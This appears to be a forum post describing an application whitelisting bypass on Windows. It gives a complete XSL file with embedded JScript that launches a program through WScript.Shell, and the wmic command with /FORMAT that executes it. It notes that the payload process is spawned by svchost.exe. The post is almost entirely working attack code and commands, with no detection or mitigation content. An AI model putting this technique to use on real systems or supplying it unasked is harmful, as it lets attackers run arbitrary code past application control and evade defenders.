Application Whitelisting Bypass with WMIC and XSL

Polaris

Member
Staff member
Posts
28
Likes
3
Points
8
Joined
Jan, 2023
3 YEARS
3 YEARS OF SERVICE
Another application whitelist bypassing technique discovered by Casey @subTee, similar to squiblydoo

Execution
Define the XSL file containing the jscript payload:

Code:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc");
    ]]> </ms:script>
</stylesheet>

Invoke any wmic command now and specify /format pointing to the evil.xsl:

Code:
wmic os get /FORMAT:"evil.xsl"

Screenshot from 2019-04-10 22-05-24.png

Observation

Calculator is spawned by svchost.exe:

Screenshot from 2019-04-10 21-57-52.png
 

119

78

97

Top